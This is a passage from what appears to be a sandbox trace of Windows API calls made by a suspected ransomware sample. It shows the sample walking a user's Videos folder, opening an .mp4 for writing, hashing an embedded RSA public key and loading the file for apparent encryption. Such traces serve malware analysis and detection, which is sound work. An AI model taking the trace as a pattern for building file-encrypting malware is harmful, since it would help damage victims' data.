Size=0x20) returned 0x2d27ce8 [0195.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.823] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0195.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.823] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0195.823] PathFindFileNameW (pszPath="") returned="" [0195.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.823] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\EXZou4J4nw j\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\exzou4j4nw j\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aaa4910, ftCreationTime.dwHighDateTime=0x1d89fcb, ftLastAccessTime.dwLowDateTime=0x316ec030, ftLastAccessTime.dwHighDateTime=0x1d8a135, ftLastWriteTime.dwLowDateTime=0x316ec030, ftLastWriteTime.dwHighDateTime=0x1d8a135, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa90 [0195.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.837] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aaa4910, ftCreationTime.dwHighDateTime=0x1d89fcb, ftLastAccessTime.dwLowDateTime=0x316ec030, ftLastAccessTime.dwHighDateTime=0x1d8a135, ftLastWriteTime.dwLowDateTime=0x316ec030, ftLastWriteTime.dwHighDateTime=0x1d8a135, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.838] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7273f840, ftCreationTime.dwHighDateTime=0x1d89ebd, ftLastAccessTime.dwLowDateTime=0x6e4968a0, ftLastAccessTime.dwHighDateTime=0x1d8a524, ftLastWriteTime.dwLowDateTime=0x6e4968a0, ftLastWriteTime.dwHighDateTime=0x1d8a524, nFileSizeHigh=0x0, nFileSizeLow=0x139d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="be8FTJbjiDo10bNZv.mp4", cAlternateFileName="BE8FTJ~1.MP4")) returned 1 [0195.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd6) returned 0x762d70 [0195.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.838] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\EXZou4J4nw j\\be8FTJbjiDo10bNZv.mp4") returned=".mp4" [0195.838] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\EXZou4J4nw j\\be8FTJbjiDo10bNZv.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\exzou4j4nw j\\be8ftjbjido10bnzv.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0195.842] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=80336) returned 1 [0195.842] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0195.844] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x139aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.845] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0195.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.846] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.846] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x139d0, lpOverlapped=0x0) returned 1 [0195.847] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0195.847] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.847] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.848] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea898) returned 1 [0195.848] CryptCreateHash (in: hProv=0x6ea898, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0195.848] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.848] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0195.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0195.849] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0195.849] GetLastError () returned 0x0 [0195.849] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0195.849] CryptReleaseContext (hProv=0x6ea898, dwFlags=0x0) returned 1 [0195.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0195.849] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0195.849] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0195.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.849] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0195.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x139d0) returned 0x2d4b778 [0195.850] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0195.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0195.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0195.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42808 [0195.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a168 [0195.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42850 [0195.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a180 [0195.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1b0 [0195.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a210 [0195.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1c8 [0195.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0195.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0195.851] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0195.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0195.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1b0 | out: hHeap=0x6a0000) returned 1 [0195.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1c8 | out: hHeap=0x6a0000) returned 1 [0195.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a210 | out: hHeap=0x6a0000) returned 1 [0195.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0195.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a210 [0195.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0195.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1c8 [0195.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0195.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a1b0 [0195.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0195.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0195.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0195.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0195.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0195.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0195.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0195.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0195.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1c8 | out: hHeap=0x6a0000) returned 1 [0195.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1b0 | out: hHeap=0x6a0000) returned 1 [0195.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0195.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a210 | out: hHeap=0x6a0000) returned 1 [0195.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0195.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0195.854] GetCurrentThreadId () returned 0x264 [0195.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0195.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d46e10 [0195.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0195.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0195.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0195.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0195.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0195.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.855] GetCurrentThreadId () returned 0x264 [0195.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0195.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0195.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0195.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0195.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0195.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a210 [0195.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0195.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0195.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0195.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0195.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1b0 [0195.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0195.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0195.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0195.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0195.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1c8 [0195.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0195.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0195.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0195.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a198 [0195.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0195.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a228 [0195.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0195.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1f8 [0195.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1e0 [0195.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a240 [0195.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1e0 | out: hHeap=0x6a0000) returned 1 [0195.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1e0 [0195.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1f8 | out: hHeap=0x6a0000) returned 1 [0195.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0195.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0195.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0195.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1b0 | out: hHeap=0x6a0000) returned 1 [0195.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1b0 [0195.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0195.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a210 | out: hHeap=0x6a0000) returned 1 [0195.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0195.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a240 | out: hHeap=0x6a0000) returned 1 [0195.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3b678 [0195.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0195.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0195.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1b0 | out: hHeap=0x6a0000) returned 1 [0195.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fc90 [0195.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0195.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0d0a0 [0195.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0195.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0195.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0195.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0195.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0195.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0195.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1e0 | out: hHeap=0x6a0000) returned 1 [0195.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a228 | out: hHeap=0x6a0000) returned 1 [0195.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0195.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1c8 | out: hHeap=0x6a0000) returned 1 [0195.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a198 | out: hHeap=0x6a0000) returned 1 [0195.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0195.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0195.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0195.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a180 | out: hHeap=0x6a0000) returned 1 [0195.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42850 | out: hHeap=0x6a0000) returned 1 [0195.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0195.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0195.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0195.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0195.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0195.866] HeapFree (in: 